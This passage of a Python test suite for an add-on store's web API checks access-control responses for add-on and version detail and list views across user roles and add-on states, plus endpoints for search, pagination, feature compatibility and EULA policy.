self.url = reverse('addons.find_replacement') + '?guid=xxx'
response = self.client.get(self.url)
self.assert3xx(
response, '/addon/replacey/?src=%s' % FIND_REPLACEMENT_SRC)
def test_match_no_leading_slash(self):
addon_factory(slug='replacey')
ReplacementAddon.objects.create(guid='xxx', path='addon/replacey/')
self.url = reverse('addons.find_replacement') + '?guid=xxx'
response = self.client.get(self.url)
self.assert3xx(
response, '/addon/replacey/?src=%s' % FIND_REPLACEMENT_SRC)
def test_no_guid_param_is_404(self):
self.url = reverse('addons.find_replacement')
response = self.client.get(self.url)
assert response.status_code == 404
def test_external_url(self):
ReplacementAddon.objects.create(
guid='xxx', path='https://mozilla.org/')
self.url = reverse('addons.find_replacement') + '?guid=xxx'
response = self.client.get(self.url)
self.assert3xx(
response, get_outgoing_url('https://mozilla.org/'))
class AddonAndVersionViewSetDetailMixin(object):
"""Tests that play with addon state and permissions. Shared between addon
and version viewset detail tests since both need to react the same way."""
def _test_url(self):
raise NotImplementedError
def _set_tested_url(self, param):
raise NotImplementedError
def test_get_by_id(self):
self._test_url()
def test_get_by_slug(self):
self._set_tested_url(self.addon.slug)
self._test_url()
def test_get_by_guid(self):
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_by_guid_uppercase(self):
self._set_tested_url(self.addon.guid.upper())
self._test_url()
def test_get_by_guid_email_format(self):
self.addon.update(guid='my-addon@example.tld')
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_by_guid_email_short_format(self):
self.addon.update(guid='@example.tld')
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_by_guid_email_really_short_format(self):
self.addon.update(guid='@example')
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_not_public_anonymous(self):
self.addon.update(status=amo.STATUS_NOMINATED)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_public_no_rights(self):
self.addon.update(status=amo.STATUS_NOMINATED)
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_public_reviewer(self):
self.addon.update(status=amo.STATUS_NOMINATED)
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_not_public_author(self):
self.addon.update(status=amo.STATUS_NOMINATED)
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_disabled_by_user_anonymous(self):
self.addon.update(disabled_by_user=True)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is True
assert data['is_disabled_by_mozilla'] is False
def test_get_disabled_by_user_other_user(self):
self.addon.update(disabled_by_user=True)
user = UserProfile.objects.create(username='someone')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is True
assert data['is_disabled_by_mozilla'] is False
def test_disabled_by_admin_anonymous(self):
self.addon.update(status=amo.STATUS_DISABLED)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is True
def test_disabled_by_admin_no_rights(self):
self.addon.update(status=amo.STATUS_DISABLED)
user = UserProfile.objects.create(username='someone')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is True
def test_get_not_listed(self):
self.make_addon_unlisted(self.addon)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_listed_no_rights(self):
user = UserProfile.objects.create(username='simpleuser')
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_listed_simple_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_listed_specific_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:ReviewUnlisted')
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_not_listed_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_deleted(self):
self.addon.delete()
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_deleted_no_rights(self):
self.addon.delete()
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_deleted_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.addon.delete()
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_deleted_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, 'Addons:ViewDeleted,Addons:Review')
self.addon.delete()
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_deleted_author(self):
# Owners can't see their own add-on once deleted, only admins can.
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.addon.delete()
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_addon_not_found(self):
self._set_tested_url(self.addon.pk + 42)
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
class TestAddonViewSetDetail(AddonAndVersionViewSetDetailMixin, TestCase):
client_class = APITestClient
def setUp(self):
super(TestAddonViewSetDetail, self).setUp()
self.addon = addon_factory(
guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
self._set_tested_url(self.addon.pk)
def _test_url(self):
response = self.client.get(self.url)
assert response.status_code == 200
result = json.loads(response.content)
assert result['id'] == self.addon.pk
assert result['name'] == {'en-US': u'My Addôn'}
assert result['slug'] == self.addon.slug
assert result['last_updated'] == (
self.addon.last_updated.replace(microsecond=0).isoformat() + 'Z')
return result
def _set_tested_url(self, param):
self.url = reverse_ns('addon-detail', kwargs={'pk': param})
def test_detail_url_with_reviewers_in_the_url(self):
self.addon.update(slug='something-reviewers')
self.url = reverse_ns('addon-detail', kwargs={'pk': self.addon.slug})
self._test_url()
def test_hide_latest_unlisted_version_anonymous(self):
unlisted_version = version_factory(
addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
unlisted_version.update(created=self.days_ago(1))
result = self._test_url()
assert 'latest_unlisted_version' not in result
def test_hide_latest_unlisted_version_simple_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
unlisted_version = version_factory(
addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
unlisted_version.update(created=self.days_ago(1))
result = self._test_url()
assert 'latest_unlisted_version' not in result
def test_show_latest_unlisted_version_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
unlisted_version = version_factory(
addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
unlisted_version.update(created=self.days_ago(1))
result = self._test_url()
assert result['latest_unlisted_version']
assert result['latest_unlisted_version']['id'] == unlisted_version.pk
def test_show_latest_unlisted_version_unlisted_reviewer(self):
user = UserProfile.objects.create(username='author')
self.grant_permission(user, 'Addons:ReviewUnlisted')
self.client.login_api(user)
unlisted_version = version_factory(
addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
unlisted_version.update(created=self.days_ago(1))
result = self._test_url()
assert result['latest_unlisted_version']
assert result['latest_unlisted_version']['id'] == unlisted_version.pk
def test_with_lang(self):
self.addon.name = {
'en-US': u'My Addôn, mine',
'fr': u'Mon Addôn, le mien',
}
self.addon.save()
response = self.client.get(self.url, {'lang': 'en-US'})
assert response.status_code == 200
result = json.loads(response.content)
assert result['id'] == self.addon.pk
assert result['name'] == u'My Addôn, mine'
response = self.client.get(self.url, {'lang': 'fr'})
assert response.status_code == 200
result = json.loads(response.content)
assert result['id'] == self.addon.pk
assert result['name'] == u'Mon Addôn, le mien'
response = self.client.get(self.url, {'lang': 'en-US'})
assert response.status_code == 200
result = json.loads(response.content)
assert result['id'] == self.addon.pk
assert result['name'] == u'My Addôn, mine'
class TestVersionViewSetDetail(AddonAndVersionViewSetDetailMixin, TestCase):
client_class = APITestClient
def setUp(self):
super(TestVersionViewSetDetail, self).setUp()
self.addon = addon_factory(
guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
# Don't use addon.current_version, changing its state as we do in
# the tests might render the add-on itself inaccessible.
self.version = version_factory(addon=self.addon)
self._set_tested_url(self.addon.pk)
def _test_url(self):
response = self.client.get(self.url)
assert response.status_code == 200
result = json.loads(response.content)
assert result['id'] == self.version.pk
assert result['version'] == self.version.version
def _set_tested_url(self, param):
self.url = reverse_ns('addon-version-detail', kwargs={
'addon_pk': param, 'pk': self.version.pk})
def test_version_get_not_found(self):
self.url = reverse_ns('addon-version-detail', kwargs={
'addon_pk': self.addon.pk, 'pk': self.version.pk + 42})
response = self.client.get(self.url)
assert response.status_code == 404
def test_disabled_version_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url()
def test_disabled_version_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url()
def test_disabled_version_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, '*:*')
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url()
def test_disabled_version_anonymous(self):
self.version.files.update(status=amo.STATUS_DISABLED)
response = self.client.get(self.url)
assert response.status_code == 401
def test_disabled_version_user_but_not_author(self):
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
response = self.client.get(self.url)
assert response.status_code == 403
def test_deleted_version_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
self.version.delete()
response = self.client.get(self.url)
assert response.status_code == 404
def test_deleted_version_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
self.version.delete()
response = self.client.get(self.url)
assert response.status_code == 404
def test_deleted_version_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, '*:*')
self.client.login_api(user)
self.version.delete()
self._test_url()
def test_deleted_version_anonymous(self):
self.version.delete()
response = self.client.get(self.url)
assert response.status_code == 404
def test_deleted_version_user_but_not_author(self):
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
self.version.delete()
response = self.client.get(self.url)
assert response.status_code == 404
def test_unlisted_version_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
response = self.client.get(self.url)
assert response.status_code == 403
def test_unlisted_version_unlisted_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:ReviewUnlisted')
self.client.login_api(user)
self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
self._test_url()
def test_unlisted_version_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
self._test_url()
def test_unlisted_version_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, '*:*')
self.client.login_api(user)
self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
self._test_url()
def test_unlisted_version_anonymous(self):
self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
response = self.client.get(self.url)
assert response.status_code == 401
def test_unlisted_version_user_but_not_author(self):
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
response = self.client.get(self.url)
assert response.status_code == 403
class TestVersionViewSetList(AddonAndVersionViewSetDetailMixin, TestCase):
client_class = APITestClient
def setUp(self):
super(TestVersionViewSetList, self).setUp()
self.addon = addon_factory(
guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
self.old_version = self.addon.current_version
self.old_version.update(created=self.days_ago(2))
# Don't use addon.current_version, changing its state as we do in
# the tests might render the add-on itself inaccessible.
self.version = version_factory(addon=self.addon, version='1.0.1')
self.version.update(created=self.days_ago(1))
# This version is unlisted and should be hidden by default, only
# shown when requesting to see unlisted stuff explicitly, with the
# right permissions.
self.unlisted_version = version_factory(
addon=self.addon, version='42.0',
channel=amo.RELEASE_CHANNEL_UNLISTED)
self._set_tested_url(self.addon.pk)
def _test_url(self, **kwargs):
response = self.client.get(self.url, data=kwargs)
assert response.status_code == 200
result = json.loads(response.content)
assert result['results']
assert len(result['results']) == 2
result_version = result['results'][0]
assert result_version['id'] == self.version.pk
assert result_version['version'] == self.version.version
result_version = result['results'][1]
assert result_version['id'] == self.old_version.pk
assert result_version['version'] == self.old_version.version
def _test_url_contains_all(self, **kwargs):
response = self.client.get(self.url, data=kwargs)
assert response.status_code == 200
result = json.loads(response.content)
assert result['results']
assert len(result['results']) == 3
result_version = result['results'][0]
assert result_version['id'] == self.unlisted_version.pk
assert result_version['version'] == self.unlisted_version.version
result_version = result['results'][1]
assert result_version['id'] == self.version.pk
assert result_version['version'] == self.version.version
result_version = result['results'][2]
assert result_version['id'] == self.old_version.pk
assert result_version['version'] == self.old_version.version
def _test_url_only_contains_old_version(self, **kwargs):
response = self.client.get(self.url, data=kwargs)
assert response.status_code == 200
result = json.loads(response.content)
assert result['results']
assert len(result['results']) == 1
result_version = result['results'][0]
assert result_version['id'] == self.old_version.pk
assert result_version['version'] == self.old_version.version
def _set_tested_url(self, param):
self.url = reverse_ns('addon-version-list', kwargs={'addon_pk': param})
def test_bad_filter(self):
response = self.client.get(self.url, data={'filter': 'ahahaha'})
assert response.status_code == 400
data = json.loads(response.content)
assert data == ['Invalid "filter" parameter specified.']
def test_disabled_version_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url_only_contains_old_version()
# A reviewer can see disabled versions when explicitly asking for them.
self._test_url(filter='all_without_unlisted')
def test_disabled_version_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url_only_contains_old_version()
# An author can see disabled versions when explicitly asking for them.
self._test_url(filter='all_without_unlisted')
def test_disabled_version_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, '*:*')
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url_only_contains_old_version()
# An admin can see disabled versions when explicitly asking for them.
self._test_url(filter='all_without_unlisted')
def test_disabled_version_anonymous(self):
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url_only_contains_old_version()
response = self.client.get(
self.url, data={'filter': 'all_without_unlisted'})
assert response.status_code == 401
response = self.client.get(
self.url, data={'filter': 'all_with_deleted'})
assert response.status_code == 401
def test_disabled_version_user_but_not_author(self):
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
self.version.files.update(status=amo.STATUS_DISABLED)
self._test_url_only_contains_old_version()
response = self.client.get(
self.url, data={'filter': 'all_without_unlisted'})
assert response.status_code == 403
response = self.client.get(
self.url, data={'filter': 'all_with_deleted'})
assert response.status_code == 403
def test_deleted_version_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
self.version.delete()
self._test_url_only_contains_old_version()
self._test_url_only_contains_old_version(filter='all_without_unlisted')
response = self.client.get(
self.url, data={'filter': 'all_with_deleted'})
assert response.status_code == 403
response = self.client.get(
self.url, data={'filter': 'all_with_unlisted'})
assert response.status_code == 403
def test_deleted_version_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
self.version.delete()
self._test_url_only_contains_old_version()
self._test_url_only_contains_old_version(filter='all_without_unlisted')
response = self.client.get(
self.url, data={'filter': 'all_with_deleted'})
assert response.status_code == 403
def test_deleted_version_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, '*:*')
self.client.login_api(user)
self.version.delete()
self._test_url_only_contains_old_version()
self._test_url_only_contains_old_version(filter='all_without_unlisted')
# An admin can see deleted versions when explicitly asking
# for them.
self._test_url_contains_all(filter='all_with_deleted')
def test_all_with_unlisted_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, '*:*')
self.client.login_api(user)
self._test_url_contains_all(filter='all_with_unlisted')
def test_with_unlisted_unlisted_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:ReviewUnlisted')
self.client.login_api(user)
self._test_url_contains_all(filter='all_with_unlisted')
def test_with_unlisted_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
self._test_url_contains_all(filter='all_with_unlisted')
def test_deleted_version_anonymous(self):
self.version.delete()
self._test_url_only_contains_old_version()
response = self.client.get(
self.url, data={'filter': 'all_with_deleted'})
assert response.status_code == 401
def test_all_without_and_with_unlisted_anonymous(self):
response = self.client.get(
self.url, data={'filter': 'all_without_unlisted'})
assert response.status_code == 401
response = self.client.get(
self.url, data={'filter': 'all_with_unlisted'})
assert response.status_code == 401
def test_deleted_version_user_but_not_author(self):
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
self.version.delete()
self._test_url_only_contains_old_version()
response = self.client.get(
self.url, data={'filter': 'all_with_deleted'})
assert response.status_code == 403
def test_all_without_and_with_unlisted_user_but_not_author(self):
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
self.version.delete()
response = self.client.get(
self.url, data={'filter': 'all_without_unlisted'})
assert response.status_code == 403
response = self.client.get(
self.url, data={'filter': 'all_with_unlisted'})
assert response.status_code == 403
class TestAddonViewSetFeatureCompatibility(TestCase):
client_class = APITestClient
def setUp(self):
super(TestAddonViewSetFeatureCompatibility, self).setUp()
self.addon = addon_factory(
guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
self.url = reverse_ns(
'addon-feature-compatibility', kwargs={'pk': self.addon.pk})
def test_url(self):
self.detail_url = reverse_ns(
'addon-detail', kwargs={'pk': self.addon.pk})
assert self.url == '%s%s' % (self.detail_url, 'feature_compatibility/')
def test_disabled_anonymous(self):
self.addon.update(disabled_by_user=True)
response = self.client.get(self.url)
assert response.status_code == 401
def test_feature_compatibility_unknown(self):
response = self.client.get(self.url)
assert response.status_code == 200
data = json.loads(response.content)
assert data['e10s'] == 'unknown'
def test_feature_compatibility_compatible(self):
AddonFeatureCompatibility.objects.create(
addon=self.addon, e10s=amo.E10S_COMPATIBLE)
response = self.client.get(self.url)
assert response.status_code == 200
data = json.loads(response.content)
assert data['e10s'] == 'compatible'
class TestAddonViewSetEulaPolicy(TestCase):
client_class = APITestClient
def setUp(self):
super(TestAddonViewSetEulaPolicy, self).setUp()
self.addon = addon_factory(
guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
self.url = reverse_ns(
'addon-eula-policy', kwargs={'pk': self.addon.pk})
def test_url(self):
self.detail_url = reverse_ns(
'addon-detail', kwargs={'pk': self.addon.pk})
assert self.url == '%s%s' % (self.detail_url, 'eula_policy/')
def test_disabled_anonymous(self):
self.addon.update(disabled_by_user=True)
response = self.client.get(self.url)
assert response.status_code == 401
def test_policy_none(self):
response = self.client.get(self.url)
assert response.status_code == 200
data = json.loads(response.content)
assert data['eula'] is None
assert data['privacy_policy'] is None
def test_policy(self):
self.addon.eula = {'en-US': u'My Addôn EULA', 'fr': u'Hoüla'}
self.addon.privacy_policy = u'My Prïvacy, My Policy'
self.addon.save()
response = self.client.get(self.url)
assert response.status_code == 200
data = json.loads(response.content)
assert data['eula'] == {'en-US': u'My Addôn EULA', 'fr': u'Hoüla'}
assert data['privacy_policy'] == {'en-US': u'My Prïvacy, My Policy'}
class TestAddonSearchView(ESTestCase):
client_class = APITestClient
fixtures = ['base/users']
def setUp(self):
super(TestAddonSearchView, self).setUp()
self.url = reverse_ns('addon-search')
def tearDown(self):
super(TestAddonSearchView, self).tearDown()
self.empty_index('default')
self.refresh()
def test_get_queryset_excludes(self):
addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=666)
addon_factory(slug='my-second-addon', name=u'My second Addôn',
weekly_downloads=555)
self.refresh()
view = AddonSearchView()
view.request = APIRequestFactory().get('/')
qset = view.get_queryset()
assert set(qset.to_dict()['_source']['excludes']) == set(
('*.raw', 'boost', 'hotness', 'name', 'description',
'name_l10n_*', 'description_l10n_*', 'summary', 'summary_l10n_*')
)
response = qset.execute()
source_keys = response.hits.hits[0]['_source'].keys()
# TODO: 'name', 'description', 'hotness' and 'summary' are in there...
# for some reason I don't yet understand... (cgrebs 0717)
# maybe because they're used for boosting or filtering or so?
assert not any(key in source_keys for key in (
'boost',
))
assert not any(
key.startswith('name_l10n_') for key in source_keys
)
assert not any(
key.startswith('description_l10n_') for key in source_keys
)
assert not any(
key.startswith('summary_l10n_') for key in source_keys
)
def perform_search(self, url, data=None, expected_status=200, **headers):
# Just to cache the waffle switch, to avoid polluting the
# assertNumQueries() call later.
waffle.switch_is_active('boost-webextensions-in-search')
with self.assertNumQueries(0):
response = self.client.get(url, data, **headers)
assert response.status_code == expected_status, response.content
data = json.loads(response.content)
return data
def test_basic(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn',
weekly_downloads=666)
addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn',
weekly_downloads=555)
self.refresh()
data = self.perform_search(self.url) # No query.
assert data['count'] == 2
assert len(data['results']) == 2
result = data['results'][0]
assert result['id'] == addon.pk
assert result['name'] == {'en-US': u'My Addôn'}
assert result['slug'] == 'my-addon'
assert result['last_updated'] == (
addon.last_updated.replace(microsecond=0).isoformat() + 'Z')
# latest_unlisted_version should never be exposed in public search.
assert 'latest_unlisted_version' not in result
result = data['results'][1]
assert result['id'] == addon2.pk
assert result['name'] == {'en-US': u'My second Addôn'}
assert result['slug'] == 'my-second-addon'
# latest_unlisted_version should never be exposed in public search.
assert 'latest_unlisted_version' not in result
def test_empty(self):
data = self.perform_search(self.url)
assert data['count'] == 0
assert len(data['results']) == 0
def test_es_queries_made_no_results(self):
with patch.object(
Elasticsearch, 'search',
wraps=amo.search.get_es().search) as search_mock:
data = self.perform_search(self.url, data={'q': 'foo'})
assert data['count'] == 0
assert len(data['results']) == 0
assert search_mock.call_count == 1
def test_es_queries_made_some_result(self):
addon_factory(slug='foormidable', name=u'foo')
addon_factory(slug='foobar', name=u'foo')
self.refresh()
with patch.object(
Elasticsearch, 'search',
wraps=amo.search.get_es().search) as search_mock:
data = self.perform_search(
self.url, data={'q': 'foo', 'page_size': 1})
assert data['count'] == 2
assert len(data['results']) == 1
assert search_mock.call_count == 1
def test_no_unlisted(self):
addon_factory(slug='my-addon', name=u'My Addôn',
status=amo.STATUS_NULL,
weekly_downloads=666,
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
self.refresh()
data = self.perform_search(self.url)
assert data['count'] == 0
assert len(data['results']) == 0
def test_pagination(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn',
weekly_downloads=33)
addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn',
weekly_downloads=22)
addon_factory(slug='my-third-addon', name=u'My third Addôn',
weekly_downloads=11)
self.refresh()
data = self.perform_search(self.url, {'page_size': 1})
assert data['count'] == 3
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon.pk
assert result['name'] == {'en-US': u'My Addôn'}
assert result['slug'] == 'my-addon'
# Search using the second page URL given in return value.
data = self.perform_search(data['next'])
assert data['count'] == 3
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon2.pk
assert result['name'] == {'en-US': u'My second Addôn'}
assert result['slug'] == 'my-second-addon'
def test_pagination_sort_and_query(self):
addon_factory(slug='my-addon', name=u'Cy Addôn')
addon2 = addon_factory(slug='my-second-addon', name=u'By second Addôn')
addon1 = addon_factory(slug='my-first-addon', name=u'Ay first Addôn')
addon_factory(slug='only-happy-when-itrains', name=u'Garbage')
self.refresh()
data = self.perform_search(self.url, {
'page_size': 1, 'q': u'addôn', 'sort': 'name'})
assert data['count'] == 3
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon1.pk
assert result['name'] == {'en-US': u'Ay first Addôn'}
# Search using the second page URL given in return value.
assert 'sort=name' in data['next']
data = self.perform_search(data['next'])
assert data['count'] == 3
assert len(data['results']) == 1
assert 'sort=name' in data['previous']
result = data['results'][0]
assert result['id'] == addon2.pk
assert result['name'] == {'en-US': u'By second Addôn'}
def test_filtering_only_reviewed_addons(self):
public_addon = addon_factory(slug='my-addon', name=u'My Addôn',
weekly_downloads=222)
addon_factory(slug='my-incomplete-addon', name=u'My incomplete Addôn',
status=amo.STATUS_NULL)
addon_factory(slug='my-disabled-addon', name=u'My disabled Addôn',
status=amo.STATUS_DISABLED)
addon_factory(slug='my-unlisted-addon', name=u'My unlisted Addôn',
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
addon_factory(slug='my-disabled-by-user-addon',
name=u'My disabled by user Addôn',
disabled_by_user=True)
self.refresh()
data = self.perform_search(self.url)
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == public_addon.pk
assert result['name'] == {'en-US': u'My Addôn'}
assert result['slug'] == 'my-addon'
def test_with_query(self):
addon = addon_factory(slug='my-addon', name=u'My Addon',
tags=['some_tag'])
addon_factory(slug='unrelated', name=u'Unrelated')
self.refresh()
data = self.perform_search(self.url, {'q': 'addon'})
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon.pk
assert result['name'] == {'en-US': u'My Addon'}
assert result['slug'] == 'my-addon'
def test_with_session_cookie(self):
# Session cookie should be ignored, therefore a request with it should
# not cause more database queries.
self.client.login(email='regular@mozilla.com')
data = self.perform_search(self.url)
assert data['count'] == 0
assert len(data['results']) == 0
def test_filter_by_type(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn')
theme = addon_factory(slug='my-theme', name=u'My Thème',
type=amo.ADDON_THEME)
addon_factory(slug='my-search', name=u'My Seárch',
type=amo.ADDON_SEARCH)
self.refresh()
data = self.perform_search(self.url, {'type': 'extension'})
assert data['count'] == 1
assert len(data['results']) == 1
assert data['results'][0]['id'] == addon.pk
data = self.perform_search(self.url, {'type': 'theme'})
assert data['count'] == 1
assert len(data['results']) == 1
assert data['results'][0]['id'] == theme.pk
data = self.perform_search(self.url, {'type': 'theme,extension'})
assert data['count'] == 2
assert len(data['results']) == 2
result_ids = (data['results'][0]['id'], data['results'][1]['id'])
assert sorted(result_ids) == [addon.pk, theme.pk]
@patch('olympia.addons.models.get_featured_ids')
def test_filter_by_featured_no_app_no_lang(self, get_featured_ids_mock):
addon = addon_factory(slug='my-addon', name=u'Featured Addôn')
addon_factory(slug='other-addon', name=u'Other Addôn')
get_featured_ids_mock.return_value = [addon.pk]
assert addon.is_featured()
self.reindex(Addon)
data = self.perform_search(self.url, {'featured': 'true'})
assert data['count'] == 1
assert len(data['results']) == 1
